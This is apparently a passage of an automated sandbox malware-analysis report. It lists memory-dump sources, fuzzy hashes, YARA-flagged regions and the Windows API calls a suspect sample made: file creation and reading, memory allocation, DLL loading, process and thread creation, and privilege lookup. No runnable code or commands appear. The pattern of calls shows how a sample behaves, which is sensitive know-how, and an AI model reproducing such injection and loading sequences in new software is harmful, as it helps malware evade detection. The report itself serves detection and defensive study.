                                                    • Instruction ID: 157f4ae51d1c3a1f7fcc1a9db768938be55d100e99180187780bd429b9f142fc
                                                    • Opcode Fuzzy Hash: a68b80efbd865cf1b9df36b916af0db3c8a1e63ab11155afd436ad11a558cc5f
                                                    • Instruction Fuzzy Hash: B8900265721004024245A55A060450B1445A7D6391391C025F1407590DCA618865B361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8c5b263b4c6f7279902252b1da5b92e981491e9b3f4d80669d7b10d3a3bab71
                                                    • Instruction ID: b3dc1aeac9bf696be6f7c29ae8c2895fef093057165e6083b373a94bbb2c057a
                                                    • Opcode Fuzzy Hash: f8c5b263b4c6f7279902252b1da5b92e981491e9b3f4d80669d7b10d3a3bab71
                                                    • Instruction Fuzzy Hash: 0D9002A170140803D240655A4804607100597D0342F51C021A2055555FCE698C51B175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 563cad84e160e56cd52bf73f5bf9b9a1283f2850d2454aa211e312757a6aff9e
                                                    • Instruction ID: 59e66213e3a93ed93b77b9806678b167bbc586353a8b81ba9bb87a82de90cd61
                                                    • Opcode Fuzzy Hash: 563cad84e160e56cd52bf73f5bf9b9a1283f2850d2454aa211e312757a6aff9e
                                                    • Instruction Fuzzy Hash: F5900271F0500412D240715A48146465006A7E0781B55C021A0505554DCD948A55B3E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c75043013531e50fd2a02426779be72707290831c80d08ffa64e064f54df7e0f
                                                    • Instruction ID: b56d3cf2ee9574400fd83e4ba8f853969553b8f38c3dc40e6c6b66ef487a321a
                                                    • Opcode Fuzzy Hash: c75043013531e50fd2a02426779be72707290831c80d08ffa64e064f54df7e0f
                                                    • Instruction Fuzzy Hash: 869002E1701144928600A25A8404B0A550597E0341B51C026E1045560DC9658851F175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa7ff524e743ac987639c540015753e9013f4a9eacda9412f6eeb9c36c896579
                                                    • Instruction ID: 5994afd66a135911602b3a840ef2c5ee63760bf69128b9811fbced88e5e7bfe4
                                                    • Opcode Fuzzy Hash: fa7ff524e743ac987639c540015753e9013f4a9eacda9412f6eeb9c36c896579
                                                    • Instruction Fuzzy Hash: 4590027170100C42D200615A4404B46100597E0341F51C026A0115654ECA55C851B561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bccfc074b3b64197159dfccc5c0fcb4a17aff420995ff18015fee691aa85e0ab
                                                    • Instruction ID: f43782f091c082e3d09da16d59e4d86b167642769c86227701557f1fd5541410
                                                    • Opcode Fuzzy Hash: bccfc074b3b64197159dfccc5c0fcb4a17aff420995ff18015fee691aa85e0ab
                                                    • Instruction Fuzzy Hash: 4D90026170144842D240625A4804B0F510597E1342F91C029A4147554DCD558855B761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 734b9d94951d3a08a23b2d9aadca14a104e24609b26ff765ae94af46728405be
                                                    • Instruction ID: 22e91758d2b49730417ba2b58a5eb21cf5995fffb4712f8fcfd674e31d4d15fb
                                                    • Opcode Fuzzy Hash: 734b9d94951d3a08a23b2d9aadca14a104e24609b26ff765ae94af46728405be
                                                    • Instruction Fuzzy Hash: FE90027170140802D200615A4808747100597D0342F51C021A5155555FCAA5C891B571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53370409009091bbb0754e4b243e197419d24fb66c3333c035b8cfb5da905fee
                                                    • Instruction ID: ba693924c14fc6e2817a285f140e5e1775b2aa4439b42ff7454baf3bef223ce7
                                                    • Opcode Fuzzy Hash: 53370409009091bbb0754e4b243e197419d24fb66c3333c035b8cfb5da905fee
                                                    • Instruction Fuzzy Hash: 6D90027170144402D240715A844460B6005A7E0341F51C421E0416554DCA558856F261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35dbbf6202909fb7d3859402b2f4b1a2b421f0583276f7f03dc2f0d54107ce06
                                                    • Instruction ID: 6bd4c9cc810df605ea55ed33e5a922d44fd0e9f59289579ae833aa2ad8789531
                                                    • Opcode Fuzzy Hash: 35dbbf6202909fb7d3859402b2f4b1a2b421f0583276f7f03dc2f0d54107ce06
                                                    • Instruction Fuzzy Hash: B990026174100C02D240715A84147071006D7D0741F51C021A0015554ECA568965B6F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FAFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FAFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FAFE01
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02773BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02773BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0277863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02773BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02773BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0277863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(02773D60,?,?,02773D60,00000000,FFFFFFFF), ref: 02778745
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtReadFile.NTDLL(02773D82,5E972F65,FFFFFFFF,02773A41,?,?,02773D82,?,02773A41,FFFFFFFF,5E972F65,02773D82,?,00000000), ref: 027786E5
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02762D11,00002000,00003000,00000004), ref: 02778809
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02762D11,00002000,00003000,00000004), ref: 02778809
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(02773D60,?,?,02773D60,00000000,FFFFFFFF), ref: 02778745
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
                                                    • Instruction ID: 2fedbcb97d90651ca2b7cd5dbb6685a74c4b8b133853260e88ce0ac8a4156947
                                                    • Opcode Fuzzy Hash: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
                                                    • Instruction Fuzzy Hash: 489002B220105402F240715944047460409D7D0345F91C465A5055555E8699EDE576A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
                                                    • Instruction ID: a8bd66cb0c326fca2cac010c999814f9e6cf62c0b5e97858b30b650b6666ca9f
                                                    • Opcode Fuzzy Hash: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
                                                    • Instruction Fuzzy Hash: 45900266211050032205A5590704507044AD7D5395391C475F1006551CD661E8716161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
                                                    • Instruction ID: f70d4f711a719384e1a56d746d748b4a85e185275b2d1795fb8abb23f8903206
                                                    • Opcode Fuzzy Hash: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
                                                    • Instruction Fuzzy Hash: 009002722010D802F2106159840474A0409D7D0345F95C865A4415659D86D5E8A17161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
                                                    • Instruction ID: 7809820b4d748bcbf79e03d33d1142efe8ac550b43a6d02a761c8e62251b9189
                                                    • Opcode Fuzzy Hash: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
                                                    • Instruction Fuzzy Hash: EF90027220105842F20061594404B460409D7E0345F91C46AA0115655D8655E8617561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
                                                    • Instruction ID: 615b8a8342c47465eb7781b76c8f5bdc218ffda24826372951cc019352ff1973
                                                    • Opcode Fuzzy Hash: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
                                                    • Instruction Fuzzy Hash: 6F90027220105802F2807159440464A0409D7D1345FD1C469A0016655DCA55EA6977E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
                                                    • Instruction ID: 64be197c74f0823c0fa35e8d8cd17716ae694a09c8557d29eaf97282cc539f18
                                                    • Opcode Fuzzy Hash: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
                                                    • Instruction Fuzzy Hash: 1D90027220509842F24071594404A460419D7D0349F91C465A0055695D9665ED65B6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
                                                    • Instruction ID: 47b3e3309cf49f5da4e07aa205e24e10dee13f6268ad02dfcae301c33212f093
                                                    • Opcode Fuzzy Hash: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
                                                    • Instruction Fuzzy Hash: 8590026221185042F30065694C14B070409D7D0347F91C569A0145555CC955E8716561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
                                                    • Instruction ID: b8a82f632fa56bf72cb7868dab52028a12b6c00b866e88fc85083968371cbf2d
                                                    • Opcode Fuzzy Hash: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
                                                    • Instruction Fuzzy Hash: 9490026A21305002F2807159540860A0409D7D1246FD1D869A0006559CC955E8796361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
                                                    • Instruction ID: 023be3e3441bce2b6c47db4864c94f0b8ccdfc22a3f1e7248344157531fa3f18
                                                    • Opcode Fuzzy Hash: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
                                                    • Instruction Fuzzy Hash: 0290027231119402F210615984047060409D7D1245F91C865A0815559D86D5E8A17162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
                                                    • Instruction ID: a83871d2278dfccabf9281bcc1d791c57444d44abaeea8f0d29d57642b5e6f32
                                                    • Opcode Fuzzy Hash: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
                                                    • Instruction Fuzzy Hash: 5B90027220105402F200659954086460409D7E0345F91D465A5015556EC6A5E8A17171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 027773B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02763B93), ref: 0277892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027672EA
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0276730B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02769BC2
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027789C4
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0276CD00,?,?), ref: 0277747C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0276CFD2,0276CFD2,?,00000000,?,?), ref: 02778A90
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(02773546,?,02773CBF,02773CBF,?,02773546,?,?,?,?,?,00000000,00000000,?), ref: 027788ED
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02767C93,?), ref: 0276D46B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                                    • Instruction ID: 5511a24f4c54aff5420223db48dfe8148004e1e209e1280ae972b50b8906f64b
                                                    • Opcode Fuzzy Hash: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                                    • Instruction Fuzzy Hash: 3CE0C2717402047EEB20EFB88C06FAA37D69B94614F0940A4F88EE73C3EE60E401C611
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02767C93,?), ref: 0276D46B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction ID: c252d5b756359b19acaa2a6c0516597d814898172613e3174d4e56f2c89510b6
                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction Fuzzy Hash: 3CD0A7717503087BEA10FAE89C07F2632CD5B44B04F494064FD49E73C3DA50F4004561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                     • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp
                                                     • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                                                    • Instruction ID: 19a7c12f2018f14f601814bec95284a66011731a66ca95b090792b4ac396b921
                                                    • Opcode Fuzzy Hash: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                                                    • Instruction Fuzzy Hash: 74B09BB29014D5C5F711D76046087177D04F7D0745F56C5A5D1020645B4778E091F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(02773546,?,02773CBF,02773CBF,?,02773546,?,?,?,?,?,00000000,00000000,?), ref: 027788ED
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
